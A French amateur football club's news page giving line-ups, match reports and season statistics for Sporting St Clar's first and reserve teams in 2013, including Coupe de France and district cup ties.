Equipe : 1. Baptiste. Péotta, 2. B. Sabarros, 3. R. Clavel, 4. A. Virelaude, 5. Benjamin. Péotta, 6. F. Larribeau, 7. F. Moussaron (Cap), 8. A. Thomeret, 9. N. Armengol, 10. N. Cantaloup, 11. L. Fabbro. Rempl : 12. R. Boukkera, 13. L. Delavat, 14. F. Auricane, 15. V. Taupiac, 16. L. Gamot. Coach: C.Boukkera But : N.Armengol (60ème) Avertissement : N.Armengol (Anti-jeu) Le début du match commence à peine, que « Nico » des 25m décoche une frappe en pivot, le gardien adverse s’y prend à deux fois pour bloquer le tir. Les joueurs de Lèguevin durcissent le jeu ce qui a pour effet de déstabiliser les St Clarais. On s’approche de la demi-heure de jeu quand un joueur adverse se lance sur son côté gauche, élimine son vis à vis, repique dans l’axe et tire, la barre transversale sauve « Bats ». Piqués au vif les joueurs du Sporting répliquent. Les coups de pied arrêtés de « Jeantho » et « Lolo » s’enchainent mais le dernier geste fait défaut. La mi-temps est sifflée sur ce score de parité : 0-0. Après la pause des citrons, Les jaunes et rouges partent à l’attaque, « Lolo » récupère un ballon dans la surface, mais sa reprise de volée n’est pas assez appuyée pour tromper le gardien. Les joueurs de Lèguevin restent dans leur philosophie du football qui leur est propre…. A l’heure de jeu, un joueur adverse touche le ballon de la main dans la surface, l’arbitre assistant appelle l’arbitre du centre et siffle pénalty. Les joueurs de Lèguevin protestent, un joueur invective l’arbitre, carton rouge de sortie, le joueur expulsé regagne les vestiaires tant bien que mal et passe ses nerfs sur les installations du club, bilan : 3 portes cassées…No comment. Entre temps « Chamako » prend ses responsabilités et marque le pénalty, 1-0. St Clar en supériorité numérique, attaque, « Nico » se fait faucher dans la surface, l’arbitre ne bronche pas. « Nico » encore lui, lancé en profondeur, rentre dans la surface, le gardien adverse le fauche d’un tacle, carton jaune pour le gardien et … coup franc. Les joueurs de Lèguevin obtiennent un dernier coup franc, mais celui-ci rase le poteau de « Bats ». L’arbitre siffle la fin du match. Victoire 1-0. Les joueurs du Sporting obtiennent leur billet pour le 4ème tour de la Coupe de France dans un match compliqué. Prochain tour, week-end du 29 septembre en espérant un gros poisson au Stade de Labarthète. Mais avant ça, samedi prochain réception du Houga en championnat dans un match tout autant difficile.
« Chamako» auteur du pénalty victorieux
Résultats du week-end (07/09/13):
Carton plein pour le Sporting à domicile
Pour leur premier match de championnat, les joueurs du Sporting recevaient réciproquement Val d’Arros et Labejan. Les réservistes fraichement promus dans cette poule de Promotion Excellence, n’ont pas raté l’occasion d’engranger leur première victoire face à Val d’Arros équipe évoluant en PL il y a encore de cela trois saisons. Et les joueurs de l’équipe fanion quant à eux ont disposé de belle manière de Labéjan en inscrivant trois jolis buts.
CHAMPIONNAT DE PROMOTION EXCELLENCE : ST CLAR II – VAL D’ARROS : 3-0
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. A. Davasse, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. JF. Jouet, 8. T. Hrodej, 9. J. Lasserre, 10. A. Serra, 11. V. Lucas. Rempl: 12. C. Maillasson, 13. C. Lecoublet, 14. P. Pinto, Coach: C. Boukkera Buts: Csc (2ème), C.Maillasson (35ème), J.Lasserre (37ème) Avertissement: Sur un terrain parfait, les réservistes du Sporting mettent le pressing d’entrée de jeu et sur un centre-tir de « Pampouille » le ballon avec la complicité du gardien adverse file au fond des filets, 1-0. On ne pouvait pas rêver meilleur départ. Les jaunes et rouges continuent sur leur lancer, « Alexis » et « Bono » affolent la défense adverse mais le dernier geste est approximatif. Les St Clarais confisquent le ballon et sur un coup franc excentré bien tiré par « Dam », le gardien repousse une tête, mais « Christo » en renard des surfaces envoie le ballon dans les filets, 2-0. Sur l’engagement, le gardien récupère le ballon mais dévisse son tir et « Pampouille » d’une jolie tête marque le but du break, 3-0. Mi-temps. Après la pause des citrons, Les joueurs de Val d’Arros reviennent sur la pelouse avec de meilleures intentions mais l’axe central St Clarais composé de « Nono » et « Bernard » ne laisse rien passé. « Alexis » et « Christo » ont plusieurs fois l’occasion d’aggraver le score mais le gardien s’interpose. « Jeff » positionné en milieu de terrain anéantit bon nombre d’occasions de Val d’Arros. Les joueurs du Sporting gèrent leur avance, mais à quelques minutes de la fin du match sur un tir croisé plein axe des joueurs adverses c’est le poteau qui sauve « Lolo ». Plus rien ne sera marqué dans cette rencontre. Belle entrée en matière dans ce championnat par les réservistes. Prochain match le 21 septembre à 18h30 contre Vic Fezensac II à St Clar.
“Coach Bouki” qui distille quelques derniers conseils avant le début du match
CHAMPIONNAT D’EXCELLENCE : ST CLAR – LABEJAN : 3-1
Equipe : 1. Baptiste. Peotta, 2. L. Fabbro, 3. B. Benard, 4. A. Virelaude, 5. Benjamin. Peotta, 6. F. Larribeau, 7. F. Moussaron (Cap), 8. Y. Abdou, 9. N. Armengol, 10. N. Cantaloup, 11. A. Thomeret. Rempl: 12. F. Auricane, 13. H. Mancey, 14. L. Delavat, Coach: J.Blancard Buts: F.Moussaron (15ème), N.Armengol (40ème) (65ème) Avertissement: La rencontre débute sous un déluge, mais les joueurs du Sporting mettent en place leur jeu. Au 1/4 heure de jeu, « Mouss » décale pour « Chamako » sur le côté gauche qui prend de vitesse son vis-à-vis, il rentre dans la surface et centre en retrait pour « Mouss » lancé qui envoie le ballon au fond des filets sans que le gardien esquive un geste, 1-0. St Clar continue sont pressing notamment par « Nico » et les défenseurs adverses sont rappelés plusieurs fois à l’ordre par l’arbitre. Sur une action anodine et un mauvais dégagement de la défense St Claraise, « Lolo » et « Bats » ne se comprennent pas et « Lolo » de la tête vient tromper « Bats », 1-1. Piqués au vif, les jaunes et rouges obtiennent un corner, « Jeantho » en maître artificier dépose le cuir sur la tête de « Chamako » au deuxième poteau qui ne se fait pas prier pour ouvrir son compteur but, 2-1. La mi-temps est sifflée sur ce score. Après la pause et l’accalmie de la pluie se sont les joueurs du Sporting qui se mettent les premiers en action, « Yass » décoche un missile de volée à l’entrée de la surface mais le gardien détourne le tir tant bien que mal. Labejan sur un joli mouvement sur le côté est tout près de réduire le score, mais la frappe rase le poteau de « Bats ». Sur une contre-attaque, « Yass » part plein axe et lance « Chamako » sur le côté, celui-ci fixe le gardien et le lobe tout en finesse, splendide, 3-1. St Clar continue de pousser, « Yass » encore lui lance « Ludo » en profondeur qui se retrouve face au gardien mais perd son duel. « Jeantho » sur un corner trouve « Francois » fraichement rentré, mais sa tête est détournée sur la ligne par un défenseur. La rencontre se termine sur ce score de 3-1. Bon match des joueurs de l’équipe fanion face une équipe de Labejan toujours difficile à manœuvrer. Prochain match samedi prochain pour le 3ème Tour de la Coupe de France contre Léguevin à St Clar.
« Chamako » n’a pas raté son retour au Stade de Labarthète, 2 buts et une passe décisive, belle soirée pour lui…
Résultat du week-end (31/08/13):
Ca passe pour le Sporting !
Pour ce 2ème Tour de Coupe de France, les joueurs du Sporting étaient opposés à Saramon, une équipe évoluant deux divisions en dessous. Les jaunes et rouges ont bien su gérer ce match à l’extérieur contre un des petits poucets.
2ème Tour de la COUPE DE FRANCE : SARAMON – ST CLAR : 1-3
Equipe : 1. Baptiste. Péotta, 2. V. Taupiac, 3. R. Boukkera, 4. F. Auricane, 5. Benjamin. Péotta, 6. A. Virelaude, 7. F. Moussaron (Cap), 8. L. Fabbro, 9. B. Poaragnimou, 10. N. Cantaloup, 11. A. Thomeret. Rempl : 12. A. Davasse, 13. PM. Sabarros, 14. L. Delavat. Coach: J.Blancard Buts : N.Cantaloup (15ème) (20ème), B.Poaragnimou (60ème) Avertissement : A.Thomeret (Tacle dangereux) Dès le coup d’envoi, les joueurs du Sporting prennent possession du ballon et construisent leurs attaques. Au quart d’heure de jeu, « Mouss » décale « Nico » dans la surface qui vient dribbler le gardien de près et ouvrir le score, 0-1. Dans la foulée, « Papy » de son camp lance parfaitement « Nico » en profondeur qui se retrouve seul face au gardien et qui ne se fait pas prier pour envoyer le ballon au fond des filets, 0-2. Le jeu retombe d’intensité, les joueurs locaux se procurent peu d’actions et leurs coups francs sont approximatifs. On s’approche de la mi-temps quand « Robi » sur son côté gauche centre parfaitement pour « Bérenger » mais sa tête fuit le cadre. Mi-temps, 0-2. Après la pause, Saramon obtient un coup franc excentré sur le côté, le tireur s’applique et trouve un de ses coéquipiers au point de pénalty qui vient fusiller « Bats » d’un joli ciseau, 1-2. S’enssuit une domination stérile des joueurs locaux et sur une contre- attaque, « Mouss » lance « Bérenger » en profondeur qui gagne son duel avec son vis-à-vis et vient lober tout en finesse le gardien adverse, 1-3. Il reste 20mn à jouer, quand tout à coup l’éclairage du terrain s’éteint, un coup de la friteuse à la buvette sûrement… Après 15mn d’attente le jeu reprend, Saramon va durcir le match, mais se sont bien les Saint Clarais qui vont se procurer encore de belles actions, notamment par « Lolo » et sa tête repoussée sur la ligne ou encore par « Nico ». Plus rien ne sera marqué, qualification des joueurs du Sporting pour le 3ème Tour de la Coupe de France. Prochain match samedi pour le début du championnat contre Labejan au Stade de Labarthète.
« Bérenger» auteur de son premier but sous ses nouvelles couleurs
Match Amical: St Clar II - Lavit II
30/08/13:
Ce soir avait lieu le deuxième match amical pour le groupe de la réserve de coach “Bouki”. Un groupe de 16 joueurs était sélectionné. L’adversaire du soir était nos voisins réservistes de Lavit évoluant dans le Tarn et Garonne. Deux mi-temps de 45mn étaient au programme. Les attaquants du Sporting se sont montrés particulièrement efficace, 10 buts ont été inscrits. “Chamako” inscrit un doublé, “Pampouille” y va aussi du sien, tout comme “Bono”. “Tom”, “Alexis”, “Christo” et “Antho” feront aussi trembler les filets à leur tour. Prochaine rencontre, samedi 7 septembre à St Clar pour le début du championnat contre Val d’Arros encore en Promotion Ligue il y a 2 ans… Photos du match:
Résultat du week-end (24/08/13):
Une bonne entrée en matière
Pour ce premier match officiel de la saison, St Clar était opposé à Ségoufielle au 1er tour de la Coupe de France, une équipe évoluant une division en dessous. Les joueurs du Sporting ont bien su gérer ce premier match contre une équipe accrocheuse.
1er Tour de COUPE DE FRANCE : ST CLAR – SEGOUFIELLE : 5-0
Equipe : 1. Baptiste. Peotta, 2. Benjamin. Peotta, 3. B. Sabarros, 4. F. Auricane, 5. A. Virelaude, 6. Y. Abdou, 7. F. Moussaron (Cap), 8. A. Jeangrand, 9. N. Cantaloup, 10. N. Armengol, 11. A. Thomeret. Rempl : 12. R. Boukkera, 13. PM. Sabarros, 14. L. Delavat, Coach: J.Blancard Buts : A.Thomeret (2ème), A.Jeangrand (60ème), N.Cantaloup (70ème) (80ème), A.Virelaude (75ème) Avertissement : A.Thomeret (Contestation) Dès le coup d’envoi, le match part sur les chapeaux de roues, à la 2ème minute de jeu sur un mauvais dégagement de la défense adverse, « Jeantho » récupère le ballon au 20m en coin et décoche une reprise de volée qui va se loger dans le petit filet du gardien de Ségoufielle, 1-0, on ne pouvait pas rêver meilleur départ. Le match s’équilibre et Ségoufielle pousse un peu plus leurs attaques mais la défense St Claraise veille. En fin de première mi-temps « Chamako » est tout près de doubler la mise mais son tir croisé frôle le poteau. Ségoufielle lance une dernière attaque et il faut toute la vigilance de « Papy » pour contrer le ballon devant le but. Mi-temps. Après la pause se sont les joueurs de Ségoufielle qui se montrent les premiers dangereux mais « Bats » nous gratifie d’une splendide parade dont il a le secret pour éviter l’égalisation. Les jaunes et rouges accentuent leur pressing et sur une mauvaise relance plein axe de la défense visiteuse « Adri » ne se fait pas prier pour venir tromper le gardien d’un petit lob, 2-0. Dix minutes plus tard, « Nico » suite à une déviation de « Ludo » marque le troisième but, 3-0. « Palof » repositionné au milieu, récupère un ballon dans les pieds de son homologue, avance et tire en puissance dans le petit filet, 4-0. A dix minute de la fin « Nico » sur une jolie passe de « Yass » vient tromper le gardien d’un joli tir du gauche, 4-0. Qualification du Sporting pour le 2ème tour de la Coupe de France qui aura lieu le week-end prochain contre Saramon vainqueur de Lectoure.
« Jeantho » auteur du plus but de la soirée pour son retour à St Clar
Match Amical: St Clar II - FC Brulhois
24/08/13:
Mercredi soir avait lieu le 1er match amical d’avant saison pour le groupe II de Coach “Bouki”. L’adversaire du soir, le FC Brulhois équipe évoluant dans le Tarn et Garonne avait loupé la montée en excellence l’an dernier, une bonne équipe en vue. Deux mi-temps de 45mn était au programme. “Ludo” est le premier à ouvrir la marque d’une jolie tête piquée suite à un corner. Ensuite le FC Brulhois va prendre ses marques et ses attaquants virevoltant vont faire trembler les filets de “Lolo” à 5 reprises. Les joueurs du Sporting n’ont pas démérité malgré le score et se sont procurés de belles occasions. Prochain match amical pour le groupe de coach “Bouki” le vendredi 30 Août avec la réception de Lavit II à St Clar. Photos du match:
Match Amical: Larrazet/Garganvillar - St Clar
20/08/13:
Hier soir avait lieu le 2ème match amical d’avant saison pour les joueurs du Sporting. Pour ce déplacement à Garganvillar (82), “Coach Julien” avait affiné son groupe par rapport à la dernière rencontre, histoire de bien préparer la réception de Ségoufielle en Coupe de France samedi. Deux mi-temps de 45mn étaient au programme. Première mi-temps brouillonne de la part des joueurs du Sporting, malgré quelques belles attaques de “Clem” sur son côté droit et une tête de “Chamako” sur la transversale suite à un corner. La deuxième mi-temps est une autre histoire. “Nico” de la tête ouvre la marque sur un joli centre de “Simon”. “Chamako” d’un joli tir croisé à l’entrée de la surface trouve à son tour le chemin des filets. Et “Nico” de nouveau suite au coup d’œil et à la vista de “Pampouille” marque de volée au 6m. Larrazet/Garganvillar réduira la marque en fin de match. Prochaine rencontre, samedi en Coupe de France contre Ségoufielle à St Clar. Photos du match:
Match Amical: Lavit - St Clar
15/08/13:
Hier soir avait lieu le 1er match amical d’avant saison pour les joueurs du Sporting. Pour ce court déplacement sur le terrain de Lavit (82), “Coach Julien” avait convoqué un groupe élargi de 17 joueurs, ce qui lui a permis de voir à l’œuvre les nouvelles recrues en situation de match. Trois mi-temps de 30mn étaient au programme. Lavit ouvre la marque dans la deuxième mi-temps sur un joli mouvement collectif, “Michou” égalise dans la foulée d’un splendide lob au 20m. Dans la troisième mi-temps “Bérenger” parti en profondeur trompe le gardien d’un tir croisé. “Mouss” suite à un corner marque d’une jolie tête le troisième but et “Lolo” juste avant la fin du match conclut la marque d’un tir enroulé en lucarne, victoire 4-1. Merci au club de Lavit pour son accueil très convivial. Prochain match amical, Lundi sur le terrain de Larrazet (82). Photos du match:
Classement final des buteurs, Le Pichichi est…
Saison 2012-2013
1er: Jérémy Lasserre avec 12 buts 2ème: Nicolas Cantaloup avec 10 buts 3ème: Frédéric Moussaron avec 10 buts
Félicitation à “Pampouille” qui termine meilleur buteur du club cette saison
Classement des buteurs en détails:
Classement final des sanctions, Le prix de la Faucheuse est décerné à…
Saison 2012-2013
1er: Aurélien Virelaude avec 4 cartons jaunes et 1 carton rouge pour un total de 141€ 2ème: Robert Boukkera avec 3 cartons jaunes et 1 carton rouge pour un total de 108€ 3ème: Arnaud Davasse avec 4 cartons jaunes pour un total de 79€
Tableaux des Sanctions:
Classement final des passeurs, Le meilleur passeur est...
Saison 2012-2013
1er: Vincent Lucas avec 9 passes décisives 2ème: Loic Fabbro avec 7 passes décisives 3ème: Tom Hrodej avec 7 passes décisives
Félicitation à “Bono” qui termine meilleur passeur du club cette saison
Classement des passeurs en détails:
Résultat du week-end (10/06/13):
Interminablement…Bon !
Après une séance de tirs au but interminable et stressante pour tous les joueurs et supporters de St Clar, « Lolo Gamot » encore une fois délivre tous les siens par son arrêt et offre par la même occasion pour la 4ème année consécutive ce Challenge du District au Sporting.
FINALE DU CHALLENGE DU DISTRICT : ST CLAR II – EAUZE II : 0-0 TAB : 11-10
Equipe : 1. L. Gamot, 2. M. Berto, 3. D. Solagna, 4. C. Lecoublet, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. M. Huntz, 8. C. Suzes, 9. J. Lasserre, 10. A. Mouchet, 11. T. Hrodej. Rempl: 12. C. Maillasson, 13. A. Arroues, 14. V. Lucas, Coachs: C. Boukkera et J. Blancard, Soigneurs : P. Pinto, M. Xompero et Y. Gensac But: Avertissement: M.Berto (Obstruction) Tout d’abord cette journée démarra par un rendez-vous donné à 9h au groupe de la réserve par « Coach Bouki » au terrain d’honneur de St Clar pour un léger réveil musculaire. Après une séance tactique sur tableau noir au Foyer du club, direction le Restaurant de l’Aérodrome à Auch pour un menu sportif d’avant match. Face à cette équipe d’Eauze que les St Clarais ont déjà affronté par deux fois en championnat cette année et qui leur avait posé bien des problèmes, le match commence timidement des deux côtés, un round d’observation s’installe. Les Elusaldes sont les premiers dangereux notamment sur coup de pied arrêté. Les réservistes répondent dans la foulée par « Tom », son tir en pivot suite à un corner est repoussé par le gardien sur le poteau. Eauze notamment par son milieu de terrain développe de bonnes actions mais la défense St Claraise veille et ne lâche rien. Suite à un nouveau coup de pied arrêté, les joueurs d’Eauze trouvent le poteau à leur tour. Les joueurs du Sporting essayent de construire leurs attaques mais la défense visiteuse anéantit toutes les actions. La mi-temps est sifflée sur ce score de parité 0-0. Après la pause des citrons, c’est Eauze qui aura plusieurs fois l’occasion de prendre l’avantage, mais leurs attaquants pêchent dans le dernier geste. Les St Clarais quant à eux seront timides offensivement, même si « Arroues » est tout près d’ouvrir le score, mais l’arbitre assistant signale un hors-jeu. Rien ne sera marqué jusqu’à la fin du temps règlementaire, on aura droit aux prolongations. La fatigue se faisant sentir, les prolongations ne donneront rien, chaque équipe restant bien en place défensivement pour éviter de prendre un but. La décision se fera donc au pénalty. Une séance de tirs au but digne d’un film « Hitchcockien », les Elusaldes ont par trois fois la victoire au bout du pied, mais « Lolo » maître en la matière d’arrêt de pénalty détourne les frappes quand ce n’est pas la maladresse des tireurs qui l’aide. « Bono » transforme son pénalty et par la même occasion le 14ème de la séance, l’attaquant d’Eauze place son ballon et tire, « Lolo » part du bon côté et l’arrête. Joie des joueurs et des nombreux supporteurs dans les tribunes. Le Sporting après 2010, 2011, 2012 remporte pour la 4ème année consécutive le Challenge du District. Après l’accession en Promotion Excellence, cette victoire en coupe ponctue une saison pleine et magnifique pour ce groupe dirigé et guidé d’une main de maître par « Coach Bouki ». Une saison qui restera longtemps historique pour le Sporting.
4ème titre consécutif en Challenge du Dsitrict pour les Réservistes du Sporting
Résultats du week-end (25/05/13):
Clap de fin en championnat !!
Ce week-end pour la dernière journée de championnat les deux équipes du Sporting étaient en déplacement. L’équipe fanion se rendait à Pavie sans pression de maintien mais avec l’envie de bien clôturer son championnat et l’équipe réserve se déplaçait à St J.Lecomtal pour affirmer un peu plus sa place de dauphin derrière Auch III.
CHAMPIONNAT DE 1ère DIVISION : ST J.LECOMTAL – ST CLAR II : 0-5
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. M. Huntz, 8. V. Lucas, 9. J. Lasserre, 10. C. Maillasson, 11. C. Suzes. Rempl: 12. T. Hrodej, 13. A. Mouchet, 14. S.Jeangrand, Coach: C. Boukkera Buts: J.Lasserre (15ème) (85ème), S.Jeangrand (40ème) (50ème), C.Maillasson (70ème) Avertissement: Pour ce dernier match de la saison sans enjeu, nos réservistes se déplaçaient à St J.Lecomtal. L’arbitre officiel de la rencontre n’étant pas présent, c’est « Pepe » qui le remplace au pied levé. Les locaux entament le match rigoureusement mais les St Clarais restent concentrés sur leur sujet et au quart d’heure de jeu sur un joli centre de « Mat », « Pampouille » d’une splendide reprise de volée en coin au 18m vient ouvrir le score, 0-1. Les jaunes et rouges continuent leur pressing mais ni « Bono » et « Christo » n’arrive à doubler la mise. Les locaux quant à eux essayent de se procurer quelques occasions, mais la défense St Claraise veille. Juste avant la mi-temps « Simon » fraichement rentré, marque le 2ème but du match sur un décalage de « Tom », 0-2. Après la pause des citrons, suite à une jolie remise de la tête de « Michou », « Simon » encore lui mais avec beaucoup de chance marque le 3ème but, 0-3. « Christo » y va aussi de son but quelques minutes après, 0-4. On s’achemine vers la fin du match, quand « Pampouille » au 20m se lève le ballon et tire en cloche, but, 0-5. Fin du match. Les réservistes réussissent leur pari de début saison et accèdent en Promotion Excellence en se classant 2ème du championnat avec 75pts, historique pour le Sporting. Mais ce groupe n’en a pas encore terminé, puisque le samedi 8 juin à Auch, ils disputeront leur 4ème finale d’affilée en Challenge du District et pourquoi pas finir la saison qui est déjà mémorable en beauté…
« Pampouille » déjà certain de finir meilleur buteur du Sporting cette saison
CHAMPIONNAT D’EXCELLENCE : PAVIE II – ST CLAR : 1-0
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. B. Sabarros, 4. A. Virelaude, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. M. Lagarde, 8. L. Delavat, 9. N. Cantaloup, 10. S. Buttigieg, 11. L. Fabbro. Rempl: 12. P. Pinto, 13. M. Xompero, 14. P. Pracca, Coach: J.Blancard But: Avertissement: A.Davasse (Tacle dangereux) Pour ce dernier match de la saison, l’équipe fanion se déplaçait à Pavie. Match important pour les locaux qui jouaient leur maintien sur cette rencontre. Face à une équipe renforcée, les St Clarais sans pression sont les premiers à être dangereux notamment par « Nico » et « Lolo », mais les tirs ne sont pas assez puissants pour inquiéter le gardien local. Quelques minutes plus tard, « Nono » y va d’un centre tir qui échoue sur la barre transversale, « Nico » suit mais un rebond capricieux l’empêche de se mettre en position de tir. Les joueurs locaux commencent à rentrer dans leur match et les attaques se multiplient mais la défense St Claraise tient bon. On se rapproche de la mi-temps, sur une nouvelle attaque de Pavie, le ballon est mal dégagé par la défense St Claraise, le milieu local récupère la balle plein axe et enroule sa frappe, imparable pour « Bats » 1-0. Après la pause des citrons, le match baisse d’intensité, à part quelques attaques des locaux bien maîtrisées par un « Papy » des grands soirs. Le match se termine sur ce score de 1-0. Fin de saison pour l’équipe fanion qui se classe 6ème au classement. Tous les joueurs se sont ensuite retrouver au Café du Centre à Fleurance où une réception les attendait pour clôturer cette fin de championnat. Rendez-vous début Août pour la reprise des entraînements.
« Papy » auteur d’un très bon match face au meilleur buteur Gersois au niveau régional « J.Pau »
Résultats du week-end (18/05/13):
Les Réservistes du Sporting ont réussi leur pari !!
Ce week-end les deux équipes du Sporting étaient en déplacement. L’équipe fanion revient de Duran avec une victoire 3-1 dans un match sans enjeu… et les réservistes quant à eux reviennent d’Ordan Larroque avec les 4 points qui leur assurent la 2ème place du championnat, étant donné que St Sauvy a perdu dans l’autre poule de 1er Division, cela conforte la place de meilleur second aux St Clarais.
CHAMPIONNAT DE 1ère DIVISION : ORDAN LARROQUE II – ST CLAR II : 0-1 Match arrêté
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. F. Larribeau, 5. A. Virelaude, 6. V. Taupiac (Cap), 7. M. Huntz, 8. T. Hrodej, 9. J. Lasserre, 10. C. Maillasson, 11. C. Suzes. Rempl: 12. M. Xompero, 13. F. Gobatto, 14. P.Pinto Coach: C. Boukkera But: J.Lasserre (10ème) Avertissement: Pour ce match à Ordan Larroque, l’équipe accueillante n’a pu présenter que 8 joueurs au coup d’envoi. Le début du match est sifflé et au bout de 10mn de jeu sur un joli centre de « Cissou », « Pampouille » au deuxième poteau après un joli contrôle envoie le ballon au fond des filets, 0-1. Sur l’engagement, après un choc, un joueur local se blesse, la partie ne pouvant pas continuer vu que l’équipe d’Ordan Larroque est réduite à 7 joueurs, l’arbitre arrête le match et siffle la fin de la rencontre. Les réservistes du Sporting se déplaceront le week-end prochain à St Jean Lecomtal pour l’ultime match de la saison et fêteront comme il se doit l’accession en division supérieure avant de se remettre au travail pour la finale du Challenge du District du 8 juin contre Eauze II.
Les réservistes du Sporting bien attablés après le match
CHAMPIONNAT D’EXCELLENCE : DURAN – ST CLAR : 1-3
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. B. Sabarros, 4. PM. Sabarros, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. C. Malateste, 8. L. Delavat, 9. N. Cantaloup, 10. S. Buttigieg, 11. L. Fabbro. Rempl: 12. T. Larribeau, 13. S. Jeangrand, 14. C. Boukkera , Coach: J.Blancard Buts: F.Moussaron (5ème), L.Delavat (8ème), N.Cantaloup (80ème) Avertissement: L’équipe fanion du Sporting se déplaçait vendredi soir à Duran pour un match sans enjeu. Les jaunes et rouges sans pression attaquent la rencontre sur les chapeaux de roue et au bout de 5mn de jeu, sur un décalage de « Nico » pour « Mouss » au 20m, celui-ci d’un tir croisé du gauche envoie le ballon dans le petit filet du gardien local, 0-1. Sur l’engagement, St Clar récupère le ballon et sur une jolie construction, « Lolo » de son aile gauche dépose le ballon sur la tête de « Ludo » au deuxième poteau, 0-2. Les joueurs du Sporting continuent d’attaquer et « Stephen » est tout près d’inscrire le 3ème but du match, mais son tir heurte le poteau. Le match retombe d’intensité, on s’achemine vers la pause, quand sur une mésentente défensive, l’attaquant local réduit le score pour son équipe, 1-2. Après la mi-temps, les joueurs locaux durcissent leur jeu…mais leurs frappes lointaines n’inquiètent pas « Bats ». Et à 10mn de la fin, « Ludo » déboule dans son couloir droit et centre pour « Nico » au 16m qui ne se fait pas prier pour marquer, 1-3. Plus rien ne sera marqué dans cette rencontre. Week-end prochain déplacement à Pavie pour l’ultime match de la saison.
« Mouss » à la lutte avec « Nico » et « Pampouille » pour finir meilleur buteur du club
Résultats du week-end (11/05/13):
Un bon week-end pour le Sporting
Ce week-end les deux équipes du Sporting recevaient leur homologue d’Eauze. Un match important pour les réservistes qu’il ne fallait surtout pas perdre, contrat réussi avec ce score de 1-1 et l’équipe fanion quant à elle a validé son maintien en Excellence avec ce match nul 1-1.
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – EAUZE II : 1-1
Equipe : 1. L. Gamot, 2. P. Pinto, 3. M. Berto, 4. T. Larribeau (Cap), 5. P. Pracca, 6. A. Mouchet, 7. T. Hrodej, 8. A. Arroues, 9. J. Lasserre, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. M. Xompero, 13. F. Gobatto, Coach: C. Boukkera But: J.Lasserre (20ème) Avertissement: Tout d’abord toutes nos félicitations à « Nj et Taupi » heureux parents d’un petit Nolan né juste avant le match et le jour des Bandas à Condom ce qui peut avoir une signification pour le Papa…et aussi toutes nos félicitations à « Arnaud Frugier » heureux papa lui aussi dans la semaine d’une petite fille prénommée Tiphaine, en espérant revoir « Arnaud » très vite sur les terrains après sa blessure en début de saison… Pour ce match au sommet entre prétendants directs à la montée, l’équipe du Sporting était amputée de plusieurs joueurs cadres. L’équipe d’Eauze elle aussi venait diminuer, seul 11 joueurs étaient présents. Avec un axe central expérimental « Titi-Pepe » mais avide d’expérience, les réservistes tatonnent en ce début de match et au bout de 10mn de jeu, l’attaquant visiteur plonge dans le dos de « Matt » et d’un joli extérieur du pied envoie le ballon dans la lucarne de « Lolo », 0-1. Piqué au vif, St Clar contre-attaque, mais le dernier geste fait défaut. Les réservistes maintiennent leur pressing et à la 20mn de jeu sur un joli décalage de « Mouchet », « Pampouille » rentre dans la surface et plein de sang-froid vient égaliser, 1-1. On se rapproche de la mi-temps, « Christo » est lancé en profondeur, tient bon face au défenseur, rentre dans la surface mais son tir n’est pas assez appuyé pour tromper le gardien visiteur. Mi-temps : 1-1. Après la pause, les joueurs d’Eauze sont les premiers à se mettre en action, mais « Lolo » claque un ballon qui partait en lucarne. La fatigue se fait sentir des deux côtés, Eauze se crée des actions dangereuses mais heureusement leurs tirs ne sont pas cadrés. A 10mn de la fin du match, « Tom » part sur le côté droit et tente sa chance en coin, le ballon frappe le poteau et revient dans les pieds de « Bono » qui reprend de volée mais un défenseur détourne le ballon du cadre. Plus rien ne sera marqué dans le match, merci encore aux « anciens » toujours prêts à donner un coup de main et qui n’ont pas démérité. Grâce à ce match nul face à Eauze, les réservistes ne sont plus qu’à une victoire de la montée en Promotion Excellence, historique pour le Club. Samedi déplacement à Ordan Larroque pour aller chercher cette fameuse montée…
« Captain Taupi » absent physiquement du match mais présent par la pensée avec ses coéquipiers
CHAMPIONNAT D’EXCELLENCE : ST CLAR – EAUZE : 1-1
Equipe : 1. Baptiste. Peotta, 2. PM. Sabarros, 3. B. Sabarros, 4. F. Larribeau, 5. Benjamin. Peotta, 6. F. Moussaron (Cap), 7. C. Malateste, 8. C. Suzes, 9. N. Cantaloup, 10. L. Delavat, 11. R. Boukkera. Rempl: 12. C. Boukkera, 13. S. Buttigieg, 14. M. Huntz , Coach: J.Blancard But: L.Delavat (30ème) Avertissements: F.Larribeau (Contestation), C.Boukkera (Tacle dangereux) L’équipe fanion avait à cœur de bien terminer la saison à domicile, mais les visiteurs au bout de 3mn de jeu sur un tir lobé des 25m cueillent à froid les St Clarais, 0-1. Eauze continue d’attaquer et il faut toute la vigilance de « Papy » pour détourner un ballon sur sa ligne. Eauze baisse de rythme… Nico d’un joli coup franc est tout près d’égaliser mais le ballon passe au-dessus. Il faut attendre la demi-heure de jeu pour voir les joueurs du Sporting égaliser, sur un centre de « Cissou » le gardien visiteur relâche le ballon et « Ludo » en profite pour envoyer le ballon de la tête au fond des filets, 1-1. La mi-temps est atteinte sur ce score de parité. Après la pause Eauze se montre dangereux sur coup de pied arrêté, mais la défense St Claraise est bien présente autour d’un « Benben » des grands soirs. St Clar pousse par intermittence, « Stephen » se démène au avant-poste mais la construction des actions est trop brouillonne pour pouvoir inquiéter l’équipe visiteuse. Plus rien ne sera marqué dans cette rencontre. Ce match nul garanti le maintien en Excellence pour l’équipe fanion. Il reste encore deux matchs à disputer, à prendre du plaisir tous ensemble et à lâcher les chevaux sans pression de résultat, à commencer par vendredi à Duran déjà relégué en division inférieure.
« Benben » auteur d’un très bon match
Résultat de la semaine (07/05/13):
Le Sporting se qualifie pour la finale du Challenge du District
En ce mardi soir, l’équipe réserve de St Clar reçevait l’équipe de St Christie Preignan pour les Demi-Finales du Challenge du District. Les jaunes et rouges se sont brillamment qualifiés pour leur 4ème finale d’affilée dans cette compétition.
